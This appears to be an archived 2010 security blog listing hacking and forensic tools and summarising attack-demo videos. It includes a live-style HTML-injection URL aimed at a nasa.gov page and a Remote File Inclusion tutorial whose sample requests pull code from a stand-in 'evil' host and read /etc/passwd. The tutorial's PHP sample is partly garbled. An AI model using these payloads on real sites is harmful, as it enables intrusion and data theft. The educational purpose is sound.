NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows that can detect the OS, hostname and open ports of network hosts through packet sniffing or by parsing a PCAP file. NetworkMiner can also extract transmitted files from network traffic including common image file formats = fun !

Download: http://sourceforge.net

SSLCertScanner : New Tool to Scan for SSL Certificates on Network

2010-07-01T11:51:00.000+08:00

SSLCertScanner is the FREE network based SSL certificate scanner software. It can remotely scan SSL certificate on any host which may present on the intranet or internet. It can also scan single host or multiple hosts at a time. Once the SSL certificate is discovered, SSLCertScanner automatically validates it by checking for expiry date.
SSLCertScanner supports HTTPS as well as LDAPS based SSL services for certificate scanning. During the scanning it displays detailed status message of current operation for each host.

Download: http://securityxploded.com

Xplico 0.5.7 - VoIP "Wire" Tapping

2010-06-28T11:17:00.001+08:00

Xplico is an open source Network Forensic Analysis Tool. Its goal is to extract from an Internet traffic capture the applications data contained. From a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.

This release introduces improvements in the SIP and RTP dissectors.
In this version was also added the RTCP dissector, with this dissector Xplico is able to obtain the phone numbers of the caller and called party (obviously only if present in the RTCP packets).

DEFT 5.1 Live distribution contains this version.

Download : http://sourceforge.net/projects/xplico/files/

DEFT Linux 5.1 Computer Forensic Live CD

2010-06-27T15:38:00.000+08:00

DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs

What’s new?
Update: Sleuthkit 3.1.1 and Autopsy 2.24
Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP)
Update: Initrd
Bug fix: Dhash report (reports were not generated)
Bug fix: DEFT Extra bug fix (a few tools did not work if the operator click on their icons, added the dd tool for x64 machines)

Download: http://www.deftlinux.net

Live Hacking Linux Security Distro Bootable CD

2010-06-24T10:59:00.000+08:00

Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders.

The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools.

The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included.

Download: http://www.livehacking.com

Lens version 1.0.0.1

2010-06-22T17:25:00.000+08:00

Lens ASP.NET Penetration Testing Tool

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.
Base features
Resize-friendly window structure
Window position is preserved across sessions
Built-in zoom
Detailed log window
Links to online information about the attacks and fixes

You can use our Lens tool to test your site against the following attacks
Session state
Eavesdropping
Session fixation (available in v.1.0.0.1)
Forms authentication
Eavesdropping
ViewState
Eavesdropping (available in v.1.0.0.1)
Information disclosure (available in v.1.0.0.1)
Event handler bypass
Event handling
Postback to disabled controls
Postback to invisible controls
One-click attack

Download: http://ethicalhackingaspnet.codeplex.com

Bruter 1.0

2010-06-20T12:32:00.001+08:00

Bruter is a parallel network login brute forcer on Win32 platform only. It currently supports following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3,SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC.

To see full changelog since alpha version check:http://sourceforge.net/projects/worawita/files/Bruter/Bruter%201.0/Changelog.txt/view

Download: http://sourceforge.net/projects/worawita

Social-Engineering Toolkit

2010-06-16T20:10:00.000+08:00

The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing.Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering.

Download: http://www.social-engineer.org

For more info and video demo check: David Kennedy (ReL1K) website

x5s - Automated Cross-Site Scripting

2010-06-14T11:53:00.000+08:00

x5s is a Fiddler addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. It's main goal is to help you identify the hotspots where XSS might occur by:

Detecting where safe encodings were not applied to emitted user-inputs
Detecting where Unicode character transformations might bypass security filters
Detecting where non-shortest UTF-8 encodings might bypass security filters

It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to help an analyst identify where XSS filters might be bypassed. The approach to finding these hotspots involves injecting single-character probes separately into each input field of each request, and detecting how they were later emitted. The focus is on reflected XSS issues however persisted issues can also be detected. The idea of injecting special Unicode characters and non-shortest form encodings was to identify where transformations occur which could be used to bypass security filters. This also has the interesting side effect of illuminating how all of the fields in a Web-app handle Unicode. For example, in a single page with many inputs, you may end up seeing the same test case get returned in a variety of ways – URL encoded, NCR encoded, ill-encoded, raw, replaced, dropped, etc. In some cases where we’ve had Watcher running in conjunction, we’ve been able to detect ill-formed UTF-8 byte sequences which is indicative of ‘other’ problems.

x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else?

x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotspot it's the tester's job to perform further validation and XSS testing.

The types of test cases that x5s includes:

Traditional test cases - characters typically used to test for XSS injection such as <, >, ",and ' which are used to control HTML, CSS, or javascript;
Transformable test cases - characters that might uppercase, lowercase, Normalize, best-fit map, or other wise transform to completely different characters, E.g. the Turkish 'İ' which will lower-case to 'i' in culture-aware software.
Overlong UTF-8 test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above. E.g. the ASCII < is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.

W3af v1.0-rc3

2010-06-11T13:30:00.006+08:00

W3af, is a Web Application Attack and Audit Framework. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much

The development team is proud to announce a new w3af release! Some of the features of the 1.0-rc3 version are:

* Enhanced GUI, including huge changes in the MITM proxy and the Fuzzy Request Editor
* Increased speed by rewriting parts of the thread management code
* Fixed tons of bugs
* Reduced memory usage
* Many plugins were rewritten using different techniques that use less HTTP requests to identify the same vulnerabilities
* Reduced false positives

You can download the latest versions from the official w3af website: http://w3af.sf.net

Jacknsee

2010-06-10T11:55:00.001+08:00

Jacknsee is an educational network security tool. Its purpose is to teach students in computer science how basic hijacking techniques are used to corrupt a network. A few examples are given: man in the middle, DoS, stack buffer overflow attack

Video demo: http://jacknsee.sourceforge.net/demo.html

Download and more info: http://jacknsee.sourceforge.net

SamuraiWTF 0.8

2010-06-08T11:42:00.001+08:00

Web penetration testing live CD built on open source software

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

This version includes metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release

More info and Download: http://samurai.inguardians.com

SpiderLabs Defacetool

2010-06-07T16:42:00.002+08:00

DefaceTool is an open-source Java Server Faces(JSF)testing tool for decoding view state and creating view state attack vectors. The tool can be used to create XSS attacks and session and application scope attacks against Apache MyFaces 1.2.8 applications. The tool has been architected to be extensible and can be modified to support other versions of Apache MyFaces and Sun Mojarra.

Check https://www.trustwave.com/spiderLabs-tools.php

D-Link Routers: One Hack to Own Them All

2010-06-04T11:58:00.000+08:00

Multiple D-Link Routers Vulnerable to Authentication Bypass

Multiple D-Link routers suffer from insecure implementations of the Home
Network Administration Protocol which allow unauthenticated and/or
unprivileged users to view and configure administrative settings on the
router.

Further, the mere existence of HNAP allows attackers to completely bypass
the CAPTCHA login features that D-Link has made available in recent
firmware releases.

These vulnerabilities can be exploited by an individual inside the local
network, as well as an external attacker.

It is suspected that most, if not all, D-Link routers manufactured since
2006 have HNAP support and are vulnerable. However, only the following
routers and firmware versions have been confirmed to date:

1) DI-524 hardware version C1, firmware version 3.23
2) DIR-628 hardware version B2, firmware versions 1.20NA and
1.22NA
3) DIR-655 hardware version A1, firmware version 1.30EA

You can read full write-up here, and download POC tool, HNAP0wn, here.

Webraider

2010-06-02T10:17:00.000+08:00

WebRaider is a plugin based automated web application exploitation tool which focuses to get a shell from multiple targets or injection point

Internally WebRaider uses Metasploit. We use a specific version of Metasploit. We trim the fat from Metasploit to launch it faster and make it smaller. You can change the paths and make it work with the latest Metasploit of your own setup.

Note: Your antivirus won't like the WebRaider download package as it includes reverse shell executables and other metasploit files.

WebRaider Presentation and White Paper and Download

Plecost: Wordpress Finger Printer

2010-05-31T11:28:00.000+08:00

Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin, if there.

Plecost retrieves the information contained on Web sites supported by Wordpress, and also allows a search on the results indexed by Google.

Download: http://code.google.com/p/plecost

Clickjacking

2010-05-27T11:27:00.000+08:00

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.

This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk.

Among the features of the new tool are:
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the science
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.

http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip

Cracking WPA2 Password Using Pyrit (GPU Cracking)

2010-05-24T15:37:00.000+08:00

In this video its shown how to attack Wireless Networks using Pyrit tool. Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK. Download and other details can be found here.

Nmap Using TOR Networks

2010-05-20T15:46:00.000+08:00

A good video showing how to scan networks with Nmap using Tor network to stay anonymous.
An Attacker downloads and configure TorTunnel,TOR bundle and proxychains. After setting up everything, an attacker uses nmap to find out the services running on different IP addresses. The main purpose of this video to stay anonymous while scanning different networks.

Milw0rm Exploits Archive

2010-05-17T15:48:00.000+08:00

A live demo on how to use the latest exploits from milw0rm.com on backtrack live distro in detail. In this video, the attacker launches an attack against a Dream FTP Server to crack the administrator 's password running on a windows box.

Karmetasploit on Backtrack4

2010-05-13T12:07:00.000+08:00

This video is about using karma exploit from Metasploit on Backtrack 4. An Attacker will setup his own fake Access Point in monitor mode, DHCP daemon and a web server daemon. Attacker runs Metasploit's karma exploit. The moment an IP address is assigned to the victim's PC, all the activity is logged at the attacker's machine including the URL visited and credentials used for mail and web access.

Sniffing And HTML Injection

2010-05-10T22:25:00.002+08:00

This video explains various examples of network sniffing and HTML injection with Ettercap-NG tool on BackTrack-4 on a Local Area Network. It shows how an attacker can change text of chat messages within LiveMessanger using ettercap filters and also using Ettercap plugin, Filters, filterf_modify, file-inject. An Attacker can even find who else is ARP poisoning on LAN using search_poisoning ettercap plugin.

Wireless Key Grabber

2010-05-05T17:27:00.001+08:00

This video shows how to use Wireless Key Grabber. It requires lighttpd and it runs a fake wireless access point to grab wireless keys. Whenever a user tries to connect to any website after connecting to this fake access point, his browser is forwarded to a customized URL. Metasploit DLL injection is used to grab wireless key.

Download link is here : http://www.megaupload.com/?d=Z1TZEFDG
Script information is here : http://pastebin.com/f29b60836

DNS Spoofing And Browser Spying Part 2

2010-05-03T16:53:00.001+08:00

In this video an attacker sniffs network traffic from a remote machine using ARP and DNS Spoofing with Ettercap.Uses Driftnet program to listens to network traffic and sniff out images from TCP streams on the network.And finally uses remote_browser plugin of ettercap which sends visited URLs of the victim to attackers browser.Like this an attacker's browser follows what ever the victim is browsing.

DNS Spoofing And Browser Spying Part 1

2010-04-30T12:05:00.001+08:00

This is the first video of three parts that explains various examples of sniffing using the Ettercap-NG tool, on BackTrack-4, in a Local Area Network scenario. This part explains OS Fingerprinting - Arp Poisoning and one example using Etterfilter.

HTML Injection in NASA Website

2010-04-28T20:56:00.000+08:00

Last February 25, 2010 I made a full disclosure type of post here regarding multiple nasa.gov server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.

http://starbrite.jpl.nasa.gov/pds/viewDataset.jsp?dsid=error%3E%3Ciframe%20src=%22http://www.hackthissite.org%22%20%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E

Sniffing SSL Secured Logins with Ettercap

2010-04-26T15:44:00.000+08:00

A Small video showing how easy it is to intercept HTTPS traffic from switched local network by spoofing the SSL certificate using man in the middle attack with Ettercap. The attacker uses one way ARP poisoning on victim and issues a fake spoofed SSL certificates on a switched Ethernet network.

DHCP Spoofing MITM Attack Using Ettercap

2010-04-23T17:57:00.000+08:00

This video is showing how to spoof DHCP IP assignment using Ettercap. When a new PC is added on the network which is configured to have IP address dynamically from a DHCP address. An attcker can spoof this IP assignment process and provide his own IPs, like a gateway which has been configured to sniff their usernames and passwords.

Bluetooth sniffing in Linux

2010-04-22T16:07:00.000+08:00

A very good video showing how to sniff BlueTooth Pin while pairing two BlueTooth devices and then crack it.

Securing Web Applications

2010-04-20T16:05:00.002+08:00

Securing Web Services - Presentation Transcript

Securing Web Applications Tara Kissoon, CISA, CISSP Visa Inc.
Objectives The participant will learn more about: How to integrate OWASP Top 10 to mitigate Web application security vulnerabilities.
What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration files, executable programs and data files. – Is layered above an operating system and uses the functionality of the operating system to deliver its service. – The operating system provides a number of mechanisms used for securing the application. – Contains security functionality that uses mechanisms not residing within the operating system.
This presentation is on Web Services Security , pointing at almost all of the fields requires attention for web application security.Shows how to effectively manage application development lifecycle and how to integrate Top 10 OWASP projects to develop any application keeping security in mind.

A1 - Cross Site Scripting (XSS)

A2 - Injection Flaws

A3 - Malicious File Execution

A4 - Insecure Direct Object Reference

A5 - Cross Site Request Forgery (CSRF)

A6 - Information Leakage and Improper Error Handling

A7 - Broken Authentication and Session Management

A8 - Insecure Cryptographic Storage

A9 - Insecure Communications

A10 - Failure to Restrict URL Access

Windows SMB Relay Exploit

2010-04-19T11:56:00.000+08:00

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.

A live demonstration of obtaining admin access on a Windows XP SP3 Machine. Exploits a flaw in Windows Server Message Block (SMB) which provides shared access to files and folders on network. Hacker utilizes Metasploits Framework to run the exploit.It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer and can even get a reverse shell.Hacker forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.For authentication target computer is forwarded to Metasploit.

Remote Shell with a Word document

2010-04-18T00:28:00.000+08:00

Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.

Honeypots

2010-04-16T18:38:00.001+08:00

Honey Pot Systems are decoy servers or systems setup to gather information regarding an attacker or intruder into your system. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional level or system.

Honey Pots can be setup inside, outside or in the DMZ of a firewall design or even in all of the locations although they are most often deployed inside of a firewall for control purposes. In a sense, they are variants of standard Intruder Detection Systems (IDS) but with more of a focus on information gathering and deception.

An example of a Honey Pot systems installed in a traditional Internet security design:

A Honey Pot system is setup to be easier prey for intruders than true production systems but with minor system modifications so that their activity can be logged of traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey can be monitored and saved.

Generally, there are two popular reasons or goals behind setting up a Honey Pot:

Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems.
Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute.

The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered.

Those goals are:

The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT based system, it should appear to the potential intruder that the system has not been modified or they may disconnect before much information is collected.
You need to be careful in what traffic you allow the intruder to send back out to the Internet for you don’t want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside of the firewall!)
You will want to make your Honey Pot an interesting site by placing "Dummy" information or make it appear as though the intruder has found an "Intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate so that intruders will spend enough time investigating and perusing the system so that you are able to gather as much forensic information as possible.

Some caveats exist that should be considered when implementing a Honey pot system. Some of the more important are:

The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.

PHP Remote File Inclusion

2010-04-15T17:06:00.000+08:00

Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

Code execution on the web server
Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation

In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function, most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive and if enabled it allows filesystem functions to use a URL which allow them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.

Example

Consider this PHP script (which includes a file specified by request):


   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
?>


method="get">
   >
    type="submit">
>

The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

/vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
/vulnerable.php?COLOR=C:\\notes.txt - example using NULL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the Null character)

SSH Hacking

2010-04-14T11:34:00.000+08:00

In this video, a shell script does the work on Linux to hack into a ssh account. Then a dictionary attack is launched against SSH using the shell script to crack the password.

Using NetCat as a Backdoor

2010-04-13T11:47:00.000+08:00

In this video a windows RPC exploit is used with the help of Metasploit on Backtrack.After exploiting the RPC vulnerability in windows,hacker uploads Netcat tool to regain access when ever he wants.

Metasploit Autopwn Tool

2010-04-12T15:38:00.000+08:00

This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques. Just run the Metasploit framework and connect to sqlite database. Then run a port scan on victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result, Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.

Dump Cleartext Passwords From Windows Memory

2010-04-11T17:30:00.000+08:00

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

DNS Spoof Virtual Hosts

2010-04-09T19:04:00.000+08:00

DNS Spoofing is a type of MITM attack in which victim's computer is sent a fake DNS reply for a particular website,forcing his machine to visit a different site.But when this Spoofed IP is hosting multiple virtual sites with multiple Host Headers and attacker wants to use this IP as a fake DNS reply for DNS Spoofing then the server will not be able to determine the proper destination as Host Header will be missing in the request.Hence DNS Spoofing attack will not success.

In this video , Ettercap is combined with a C program to change the host header on the fly and submits a new get request to the web server, which allows an attacker to successfully launch DNS Spoofing attack with a IP hosting multiple virtual web sites.

Attacking Oracle with the Metasploit Framework

2010-04-08T12:31:00.000+08:00

The Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009, Oracle remains a major presence in database computing.
Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name Oracle comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.

Auditing Anti-Virus Configuration and Installation with Nessus 3

2010-04-07T20:07:00.000+08:00

Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:

Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
Misconfiguration (e.g. open mail relay, missing patches, etc).
Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
Denials of service against the TCP/IP stack by using mangled packets

On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system. According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Exploiting XP with SAINT

2010-04-06T09:49:00.000+08:00

The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, Web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability prove its existence without a doubt.

Exploiting Windows Vista with Core Impact 8

2010-04-05T18:05:00.001+08:00

CORE IMPACT is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.
Core Impact is designed to attempt to evaluate the whole of the security in an office ecosystem, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well checking for compliance with government regulation.

Hacking Guestbook (Redirect)

2010-04-05T11:57:00.000+08:00

Owning with Nessus and Metasploit

2010-04-04T13:55:00.001+08:00

Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
Misconfiguration (e.g. open mail relay, missing patches, etc).
Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
Denials of service against the TCP/IP stack by using mangled packets.

On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Packing Metasploit's Meterpreter with Calculator using IExpress

2010-04-03T09:45:00.001+08:00

This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.

Meterpreter as a Backdoor

2010-04-02T18:42:00.001+08:00

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Pass the Hash with modified SMB Client Vulnerability

2010-04-02T11:05:00.001+08:00

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.

Cracking Tutorial

2010-04-01T13:18:00.000+08:00

Software cracking is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.
The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.

Amazon EC2 Service In Depth (Cloud Computing)

2010-03-31T10:05:00.000+08:00

Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.
It is a paradigm shift following the shift from mainframe to client-server that preceded it in the early '80s. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them. Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet. It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.
The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network, and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents. Typical cloud computing providers deliver common business applications online which are accessed from another web service or software like a web browser, while the software and data are stored on servers.
A technical definition is "a computing capability that provides an abstraction between the computing resource and its underlying technical architecture (e.g., servers, storage, networks), enabling convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction." This definition states that clouds have five essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service.
The majority of cloud computing infrastructure, as of 2009, consists of reliable services delivered through data centers and built on servers. Clouds often appear as single points of access for all consumers' computing needs. Commercial offerings are generally expected to meet quality of service (QoS) requirements of customers and typically offer SLAs.

Reset Passwords on Windows XP and Vista using Backtrack 4

2010-03-30T20:13:00.003+08:00

chntpw is a Linux utility for resetting passwords of Windows (NT or 2k) users. It works by modifying the encrypted password in the registry directly, bypassing the need to use the old password.

Terminal Server / RDP Cracking

2010-03-30T09:51:00.001+08:00

The simple demonstration above using the featured tools demonstrates the dangers of using weak passwords (those that can be found in a dictionary file) in Windows Remote Terminal Services and Remote Desktop Protocol (RDP).

Firewalls

2010-03-29T19:50:00.002+08:00

A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer based application upon a set of rules and other criteria.

Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
There are several types of firewall techniques:

Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.
Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.
Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

Samurai Web Assessment Framework

2010-03-27T21:02:00.003+08:00

